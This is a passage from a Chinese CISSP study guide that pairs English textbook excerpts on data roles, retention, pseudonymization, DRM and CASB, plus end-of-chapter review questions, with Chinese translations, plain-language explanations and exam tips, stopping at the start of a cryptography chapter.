授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

分类由数据所有者决定,保护由保管者实施。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
身份 身份是主体在系统中的标识。
学习单元 42 / PDF P365

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

remanence can persist due to the wear-leveling algorithms they employ, making traditional data erasure methods less effective and potentially allowing remnants of data to remain on unaddressed memory cells. Understand record retention policies. Record retention policies ensure that data is kept in a usable state while it is needed and destroyed when it is no longer needed. Many laws and regulations mandate keeping data for a specific amount of time, but in the absence of formal regulations, organizations specify the retention period within a policy.

Audit trail data needs to be kept long enough to reconstruct past incidents, but the organization must identify how far back they want to investigate. A current trend in many organizations is to reduce legal liabilities by implementing short retention policies with email. Know the difference between end of life and end of support. End of life (EOL) is the date announced by a vendor when production and sales of a product stop. However, the vendor still supports the product after EOL. End of support identifies the date when a vendor will no longer support a product. Explain DRM. Digital rights management (DRM) methods provide copyright protection for copyrighted works.

The purpose is to prevent the unauthorized use, modification, and distribution of copyrighted works. Explain CASB. A cloud access security broker (CASB) is a solution placed logically between users and cloud resources. It can apply internal security controls to cloud resources. The CASB solution can be placed on-premises or in the cloud. Define pseudonymization. Pseudonymization is the process of replacing some data elements with pseudonyms or aliases. It removes privacy data so that a dataset can be shared. However, the original data remains available in a separate dataset. Define tokenization. Tokenization replaces data elements with a string of characters or a token.

Credit card processors replace credit card data with a token, and a third party holds the mapping to the original data and the token. Define anonymization. Anonymization replaces privacy data with useful but inaccurate data. The dataset can be shared and used for analysis purposes, but anonymization removes individual identities. Anonymization is permanent. Know the responsibilities of data roles. The data owner is the person responsible for classifying, labeling, and protecting data. Data controllers

中文直译 / 整理

残留可能因它们采用的磨损均衡算法而持续存在,这使得传统数据擦除方 法效果较差,并可能导致数据残留保留在未寻址的内存单元中。 了解记录保留政策。 记录保留政策确保数据在需要期间保持可用状态,并在不 再需要时被销毁。 许多法律和法规要求将数据保留特定时间,但在没有正式法 规的情况下,组织会在政策中指定保留期限。 审计跟踪数据需要保留足够长的 时间以重建过去的事件,但组织必须明确他们希望追溯多远的历史。 许多组织 目前的趋势是通过实施较短的电子邮件保留政策来减少法律风险。 了解生命周期结束与支持结束的区别。 生命周期结束(EOL)是供应商宣布停止 产品生产和销售的日期。 然而,供应商在EOL之后仍会支持该产品。 支持结束是 指供应商将不再支持该产品的日期。 解释数字版权管理(DRM)。 数字版权管理(DRM)方法为受版权保护的作品 提供版权保护,目的是防止未经授权的使用、修改和分发受版权保护的作品。 解释CASB。 云访问安全代理(CASB)是一种部署在 用户与云资源之间的解决方案。 它可以对云资源应用内部安全控制。 CASB解 决方案可以部署在本地或云端。 定义假名化。 假名化是将某些数据元素替换为假名或别名的过程。

它移除隐私数 据,以便数据集可以共享。 然而,原始数据仍保留在另一个独立的数据集中。 定义标记化。 标记化是将数据元素替换为一串字符或标记。 信用卡处理商将信用 卡数据替换为标记,而第三方则保存原始数据与标记的映射关系。 定义匿名化。 匿名化是将隐私数据替换为有用但不准确的数据。 数据集可以共享 并用于分析目的,但匿名化会移除个人身份。 匿名化是永久性的。 了解数据角色的职责。 数据所有者是负责对数据进行分类、标记和保护的人。 数据 控制者

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Owner 定规则,Custodian 执行保护。

Policy 高层、强制、稳定;Procedure 具体步骤。

Owner 决策,Custodian 执行,User 按授权使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
政策 政策是高层原则,说明必须遵守什么。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
保留期限 保留期限规定数据、日志或记录要保存多久。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 43 / PDF P366

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

decide what data to process, the purpose of data collection, and how to process data. Data processors are third-party entities that process data for an organization at the direction of the data controller. A user accesses data while performing work tasks. The data subject is the person described in the PII. A custodian has day-to-day responsibilities for protecting and storing data. Know about security control baselines. Security control baselines provide a listing of controls that an organization can apply as a baseline. Not all baselines apply to all organizations. Organizations apply scoping and tailoring techniques to adapt a baseline to their needs. Written Lab 1.

Describe sensitive data. 2. Identify the difference between EOL and EOS. 3. Identify common uses of pseudonymization, tokenization, and anonymization. 4. Describe the difference between scoping and tailoring. Review Questions 1. Which of the following provides the best protection against the loss of confidentiality for sensitive data? A. Data labels B. Data classifications C. Data handling D. Data degaussing methods 2. Administrators regularly back up data on all the servers within your organization. They annotate an archive copy with the server it came from and the date it was created, and transfer it to an unstaffed storage warehouse.

Later, they discover that someone leaked sensitive emails sent between executives on the Internet. Security personnel discovered some archive tapes are missing, and these tapes probably included the leaked emails. Of the following choices, what would have prevented this loss without sacrificing security?

中文直译 / 整理

决定处理哪些数据、数据收集的目的以及如何处理数据。 数据处理者是根据数 据控制者的指示为组织处理数据的第三方实体。 用户在执行工作任务时访问数 据。 数据主体是个人身份信息(PII)中描述的人员。 数据保管人负责日常的数 据保护和存储工作。 了解安全控制基线。 安全控制基线提供了组织可以作为基线应用的控制措施清 单。 并非所有基线都适用于所有组织。 组织通过范围界定和定制技术,将基线 调整为符合自身需求。 实验题 1. 描述敏感数据。 2. 指出 EOL 和 EOS 之间的区别。 3. 指出伪标识化、标记化和匿名化的常见用途。 4. 描述范围界定与定制之间的区别。 复习题 1. 以下哪项能最好地防止敏感数据丢失? 机密性? A. 数据标签 B. 数据分类 C. 数据处理 D. 数据消磁方法 2. 管理员定期备份您组织内所有服务器上的数据。 他们会在归档副本上标注 数据来源的服务器和创建日期,并将其转移到无人值守的存储仓库。 后来, 他们发现有人在互联网上泄露了高管之间发送的敏感电子邮件。 安全人员发 现一些归档磁带丢失,这些磁带可能包含被泄露的电子邮件。 以下选项中, 哪一个能在不牺牲安全性的前提下防止此类损失?

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

NIST:NIST 提供美国常用安全标准、框架和指南。

数据分类:数据分类按敏感度和价值给数据贴等级,决定保护强度。

身份:身份是主体在系统中的标识。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

分类由数据所有者决定,保护由保管者实施。

身份管理题要区分识别、认证、授权、审计。

RPO 问数据:最多丢到哪个时间点。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
NIST NIST 提供美国常用安全标准、框架和指南。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 44 / PDF P367

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

A. Mark the media kept off-site. B. Don't store data off-site. C. Destroy the backups off-site. D. Use a secure off-site storage facility. 3. Administrators have been using tapes to back up servers in your organization. However, the organization is converting to a different backup system, storing backups on disk drives. What is the final stage in the life cycle of tapes used as backup media? A. Degaussing B. Destruction C. Declassification D. Retention 4. You are updating your organization's data policy, and you want to identify the responsibilities of various roles. Which one of the following data roles is responsible for classifying data? A. Controller B. Custodian C. Owner D. User 5.

You are tasked with updating your organization's data policy, and you need to identify the responsibilities of different roles. Which data role is responsible for implementing the protections defined by the security policy? A. Data custodian B. Data user C. Data processor D. Data controller 6. A company maintains an e-commerce server used to sell digital products via the Internet. When a customer makes a purchase, the server stores the following information on the buyer: name, physical address, email address, and credit card data. You're hired as an outside consultant and A.

中文直译 / 整理

标记异地保存的介质。 B. 不要将数据异地存储。 C. 在异地销毁备份。 D. 使用安全的异地存储设施。 3. 管理员一直使用磁带为贵组织的服务器进行备份。 然而,该组织正在转换 为另一种备份系统,将备份存储在磁盘驱动器上。 作为备份介质的磁带生命 周期的最后阶段是什么? A. 消磁 B. 破坏 C. 降级 D. 保留 4. 您正在更新组织的数据策略,并希望明确各个角色的职责。 以下哪种数 据角色负责对数据进行分类? A. 控制者 B. 管理者 C. 所有者 D. 用户 5. 您的任务是更新贵组织的数据策略,且您 需要明确不同角色的职责。 哪个数据角色负责实施安全策略所定义的保护 措施? A. 数据保管人 B. 数据使用者 C. 数据处理者 D. 数据控制者 6. 一家公司维护着用于销售数字产品的电子商务服务器 通过互联网。 当客户进行购买时,服务器会存储买家的以下信息:姓名、 物理地址、电子邮件地址和信用卡数据。 您被聘为外部顾问,

小白解释

场景先行:你是公司的安全负责人,正在读第 367 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

数据保管者:数据保管者按所有者要求实施备份、访问控制等保护。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

保留期限:保留期限规定数据、日志或记录要保存多久。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Custodian 常是 IT/运维角色。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
数据保管者 数据保管者按所有者要求实施备份、访问控制等保护。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
保留期限 保留期限规定数据、日志或记录要保存多久。
学习单元 45 / PDF P368

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

advise them to change their practices. Which of the following can the company implement to avoid an apparent vulnerability? A. Anonymization B. Pseudonymization C. Move the company location D. Collection limitation 7. You are performing an annual review of your company's data policy, and you come across some confusing statements related to security labeling. Which of the following could you insert to describe security labeling accurately? A. Security labeling is only required on digital media. B. Security labeling identifies the classification of data. C. Security labeling is only required for hardware assets. D. Security labeling is never used for nonsensitive data. 8.

A database file includes personally identifiable information (PII) on several individuals, including Karen C. Park. Which of the following is the best identifier for the record on Karen C. Park? A. Data controller B. Data subject C. Data processor D. Data owner 9. Administrators regularly back up all the email servers within your company, and they routinely purge on-site emails older than six months to comply with the organization's security policy. They keep a copy of the backups on-site and send a copy to one of the company warehouses for long-term storage. Later, they discover that someone leaked sensitive emails sent between executives over three years ago.

Of the following choices, what policy was ignored and allowed this data breach? A. Media destruction B. Record retention C. Configuration management

中文直译 / 整理

建议他们更改其做法。 以下哪项是公司可以实施以避免明显漏洞的措施? A. 匿名化 B. 假名化 C. 移动公司地点 D. 收集限制 7. 您正在对公司数据政策进行年度审查,发现了一些关于安全标记的令人困 惑的陈述。 以下哪一项可以用来准确描述安全标记? A. 安全标记仅适用于数字媒体。 B. 安全标签用于标识数据的分类。 C. 安全标签仅适用于硬件资产。 D. 安全标签从不用于非敏感数据。 8. 一个数据库文件包含多名个人的个人身份信息(PII),其中包括 Karen C. Park。 以下哪一项是Karen C. Park记录的最佳标识符? A. 数据控制者 B. 数据主体 C. 数据处理器 D. 数据所有者 9. 管理员定期备份公司内的所有邮件服务器,并定期删除超过六个月的本地 邮件,以遵守组织的安全策略。 他们将备份副本保存在本地,并将一份副本 发送到公司的某个仓库进行长期存储。 后来,他们发现有人泄露了三年前高 管之间发送的敏感邮件。 在以下选项中,哪项策略被忽视,导致了此次数据 泄露? A. 媒体销毁 B. 记录保留 C. 配置管理

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Owner 定规则,Custodian 执行保护。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

Owner 决策,Custodian 执行,User 按授权使用。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
保留期限 保留期限规定数据、日志或记录要保存多久。
身份 身份是主体在系统中的标识。
学习单元 46 / PDF P369

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

D. Versioning 10. An executive is reviewing governance and compliance issues and ensuring the security or data policy addresses them. Which of the following security controls is most likely driven by a legal requirement? A. Data remanence B. Data destruction C. Data user role D. Record retention 11. Your organization is donating several computers to a local school. Some of these computers include solid-state drives (SSDs). Which of the following choices is the most reliable method of destroying data on these SSDs? A. Erasing B. Degaussing C. Deleting D. Purging 12. A technician is about to remove magnetic disk drives from several computers.

His supervisor told him to ensure that the disk drives do not hold any sensitive data. Which of the following methods will meet the supervisor's requirements? A. Overwriting the disks multiple times B. Formatting the disks C. Deleting the files D. Defragmenting the disks 13. The IT department is updating the budget for the following year, and they want to include enough money for a hardware refresh for some older systems. Unfortunately, there is a limited budget. Which of the following should be a top priority? A. Systems with an end-of-life (EOL) date that occurs in the following year B. Systems used for data loss prevention D.

中文直译 / 整理

版本控制 10. 一名高管正在审查治理和合规问题,并确保安全或数据策略能解决这些 问题。 以下哪项安全控制最可能由法律要求驱动? A. 数据残留 B. 数据销毁 C. 数据用户角色 D. 记录保留 11. 您的组织正在向当地学校捐赠多台计算机。 其中一些计算机包含固态驱动 器(SSD)。 以下哪种方法是<span style="id='1'">最</span>可靠的销毁这 些SSD上数据的方法? A. 擦除 B. 消磁 C. 删除 D. 清除 12. 一名技术人员即将从多台计算机中移除磁性硬盘驱动器。 他的主管告诉他, 必须确保这些硬盘驱动器不保留任何敏感数据。 以下哪种方法能满足主管的 要求? A. 多次覆盖磁盘 B. 格式化磁盘 C. 删除文件 D. 磁盘碎片整理 13. IT 部门正在为下一年更新预算,并希望为一些较旧的系统预留足够的 资金用于硬件更新。 不幸的是,预算有限。 以下哪一项应作为最高优先级? A. 终止日期(EOL)在下一年的系统 B. 用于数据丢失防护的系统

小白解释

场景先行:你是公司的安全负责人,正在读第 369 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

保留期限:保留期限规定数据、日志或记录要保存多久。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
保留期限 保留期限规定数据、日志或记录要保存多久。
学习单元 47 / PDF P370

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

C. Systems used to process sensitive data D. Systems with an end-of-support (EOS) date that occurs in the following year 14. Developers created an application that routinely processes sensitive data. The data is encrypted and stored in a database. When the application processes the data, it retrieves it from the database, decrypts it for use, and stores it in memory. Which of the following methods can protect the data in memory after the application uses it? A. Encrypt it with asymmetric encryption. B. Encrypt it in the database. C. Implement data loss prevention. D. Purge memory buffers. 15.

Your organization's security policy mandates the use of symmetric encryption for sensitive data stored on servers. Which one of the following guidelines are they implementing? A. Protecting data at rest B. Protecting data in transit C. Protecting data in use D. Protecting the data life cycle 16. An administrator is planning to deploy a database server and wants to ensure it is secure. She reviews a list of baseline security controls and identifies the security controls that apply to this database server. What is this called? A. Tokenization B. Scoping C. Standards selection D. Imaging 17. An organization is planning to deploy an e-commerce site hosted on a web farm.

IT administrators have identified a list of security controls they say will provide the best protection for this project. Management is now reviewing the list and removing any security controls that do not align with the organization's mission. What is this called? C.

中文直译 / 整理

用于处理敏感数据的系统 D. 支持终止(EOS)日期发生在下一年的系统 14. 开发人员创建了一个经常处理敏感数据的应用程序。 数据被加密并存储在 数据库中。 当应用程序处理数据时,它从数据库中检索数据,解密后使用,并 将其存储在内存中。 以下哪种方法可以在应用程序使用后保护内存中的数据? A. 使用非对称加密对其进行加密。 B. 在数据库中对其进行加密。 C. 实施数据防泄漏。 D. 清除内存缓冲区。 15. 您组织的安全策略要求对存储在服务器上的敏感数据使用对称加密。 以下哪一项是他们正在实施的指南? A. 保护静态数据 B. 保护传输中的数据 C. 保护使用中的数据 D. 保护数据生命周期 16. 一名管理员计划部署数据库服务器,并希望确保其安全性。 她审查了一组 基线安全控制措施,并确定了适用于此数据库服务器的安全控制措施。 这称 为什么? A. 令牌化 B. 范围界定 C. 标准选择 D. 镜像 17. 一个组织计划部署托管在Web农场上的电子商务网站。 IT管理员已确定了一 组安全控制措施,他们认为这些措施将为此项目提供最佳保护。 管理层是 现在正在审查清单,并移除与组织使命不一致的安全控制措施。 这被称为什么?

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
学习单元 48 / PDF P371

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

A. Tailoring B. Sanitizing C. Asset classification D. Minimization 18. An organization is planning to use a cloud provider to store some data. Management wants to ensure that all data-based security policies implemented in the organization's internal network can also be implemented in the cloud. Which of the following will support this goal? A. CASB B. DLP C. DRM D. EOL 19. Management is concerned that users may be inadvertently transmitting sensitive data outside the organization. They want to implement a method to detect and prevent this from happening.

Which of the following can detect outgoing, sensitive data based on specific data patterns and is the best choice to meet these requirements? A. Antimalware software B. Data loss prevention systems C. Security information and event management systems D. Intrusion prevention systems 20. A software developer created an application and wants to protect it with DRM technologies. Which of the following is she most likely to include? (Choose three.) A. Virtual licensing B. Persistent online authentication C. Automatic expiration D. Continuous audit trail A.

中文直译 / 整理

定制 B. 清洁消毒 C. 资产分类 D. 最小化 18. 一个组织计划使用云服务商存储部分数据。 管理层希望确保组织内部网络 中实施的所有基于数据的安全策略也能在云中实施。 以下哪项将支持这一目 标? A. CASB B. DLP C. DRM D. EOL 19. 管理层担心用户可能会无意中将敏感数据传输到组织外部。 他们希望实 施一种方法来检测并防止这种情况发生。 以下哪项可以根据特定的数据模式 检测外出的敏感数据,并且是满足这些要求的最佳选择? A. 反恶意软件软件 B. 数据丢失防护系统 C. 安全信息和事件管理系统 D. 入侵防御系统 20. 一名软件开发者创建了一个应用程序,并希望使用DRM技术对其进行保 护。 她最可能包含以下哪几项? (选择三项。 ) A. 虚拟授权 B. 持续在线身份验证 C. 自动过期 D. 持续审计跟踪

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
第 6 章 · P372-425 · 54 个学习单元

密码学和对称密钥算法

OSG10 · Chapter 6 · Cryptography and Symmetric Key Algorithms · 全文覆盖 + 小白精读 + 画报

第 6 章:密码学和对称密钥算法

这不是提炼版。本页按 PDF 第 372-425 页连续覆盖第 6 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

54个连续学习单元
4格原文 / 直译 / 解释 / 考点
54页覆盖第6章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P372

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

